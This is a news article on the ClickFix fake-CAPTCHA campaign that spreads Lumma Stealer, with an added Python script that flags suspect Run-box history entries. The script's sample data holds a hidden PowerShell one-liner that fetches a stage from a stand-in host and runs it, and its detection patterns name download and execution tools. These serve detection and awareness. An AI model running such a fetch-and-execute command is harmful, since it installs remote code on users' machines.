A new warning has been issued as we head into the weekend: a “global attack” is now targeting Windows users in multiple countries around the world. The campaign is stupidly simple, but it hammers home the risk for the hundreds of millions of Windows 10 users heading for a world without security updates a year from now.

Last month, Palo Alto Networks’ Unit 42 flagged the risk from fake new CAPTCHAs. That report generated little attention at the time, although a video posted on X by researcher John Hammond helped raise awareness. Now the researchers at McAfee have issued a new warning about these fake CAPTCHA popups doing the rounds.

These attacks should be easy to spot—but they’re designed to be casually effective. The fake challenges are designed to distribute Lumma Stealer. “These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don’t appear to be inherently malicious on their own.”

In its new report, McAfee now warns that “the ClickFix infection chain operates by deceiving users into clicking on buttons like ‘Verify you are a human’ or ‘I am not a robot.’ Once clicked, a malicious script is copied to the user’s clipboard. Users are then misled into pasting the script after pressing the Windows key + R, unknowingly executing the malware. This method of trickery facilitates the infection process, making it easy for attackers to deploy malware.”
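The chain McAfee describes leaves a trace on the victim’s machine: the Run dialog keeps a history of what was typed into it under the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), so an analyst can check a suspect PC for a pasted PowerShell one-liner. The script below is an added example, not code from the article or from McAfee; it applies simple indicator matching to constructed RunMRU values, and the indicator names and the flagging threshold are this example’s own.

```python
import re
from typing import Iterable, List, NamedTuple, Tuple

class Finding(NamedTuple):
    entry: str
    indicators: Tuple[str, ...]

# Traits of the ClickFix chain described above: a script host started from the
# Run box, window hidden, execution policy bypassed, content pulled from the
# network and handed to an evaluator. Indicator names are this example's own.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)\b", re.I),
    "remote_fetch": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b|https?://", re.I),
    "exec_string": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}
# Any one of these on top of a script host is enough to report the entry;
# hidden-window and bypass switches alone also show up in legitimate admin use.
STRONG = {"remote_fetch", "exec_string", "encoded"}

def strip_runmru_suffix(value: str) -> str:
    """Explorer stores each RunMRU value as '<command>\\1'; return the command."""
    return value[:-2] if value.endswith("\\1") else value

def inspect_run_history(entries: Iterable[str]) -> List[Finding]:
    """Return RunMRU entries that look like a pasted ClickFix command."""
    findings = []
    for raw in entries:
        cmd = strip_runmru_suffix(raw)
        hits = tuple(name for name, rx in INDICATORS.items() if rx.search(cmd))
        if "script_host" in hits and STRONG.intersection(hits):
            findings.append(Finding(cmd, hits))
    return findings

# Constructed RunMRU values for the demo; not taken from any real host.
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"\\fileserver\share\1",
    r"powershell\1",                                        # script host alone
    r"powershell -ep bypass -file C:\tools\backup.ps1\1",   # noisy, but local
    r'powershell -w hidden -ep bypass -c "iwr http://lure.invalid/stage | iex"\1',
]

if __name__ == "__main__":
    for f in inspect_run_history(SAMPLE_RUNMRU):
        print(f"SUSPECT: {f.entry}\n   indicators: {', '.join(f.indicators)}")
```

On a live system the same function can be fed the values read from the RunMRU key with the standard winreg module; the local admin script in the sample is deliberately left unflagged to show where triage noise would otherwise come from.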

You get the pattern. The infostealing malware that will be planted on your PC will target your account details and passwords as well as crypto wallets. These lures don’t look like a normal CAPTCHA, although they are evolving, which makes it harder to be certain. Even so, when you’re copying and pasting, if alarm bells aren’t ringing in your head at that point, turn off your PC and maybe take a break.

McAfee highlights two deviously crafted lures—one targeting those looking to download pirated games, the other targeting software developers worried there might be a security issue with code they have written and released.

Users searching online for illegal copies of games probably have their guard up in any case; when doing so, the team says, “they may encounter online forums, community posts, or public repositories that redirect them to malicious links.”

The second lure is even more devious. “Users receive phishing emails, often targeting GitHub contributors, urging them to address a fake ‘security vulnerability.’ These emails contain links leading to the same fake CAPTCHA pages.”

Hudson Rock’s Infostealers website reported on the same types of attacks early this month, but again this didn’t receive the pickup it deserved. “As of late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into executing a malicious PowerShell script.”

“The ClickFix infection chain,” McAfee now says, “demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.”

This fake CAPTCHA attack is now becoming a thing—be wary and take a moment when challenged to check for any signs of compromise. It won’t always be as obvious as we are seeing here. Such attacks will evolve and become harder to spot. Certainly, you should never, ever cut and paste and execute from within a CAPTCHA.

Meanwhile, this is yet another timely warning for Windows 10 users that whatever they do between now and October next year, falling off support should not be one of them. If Microsoft doesn’t provide sensibly priced extension options and workarounds don’t fully plug the gap, you’ll need to make the move to Windows 11.
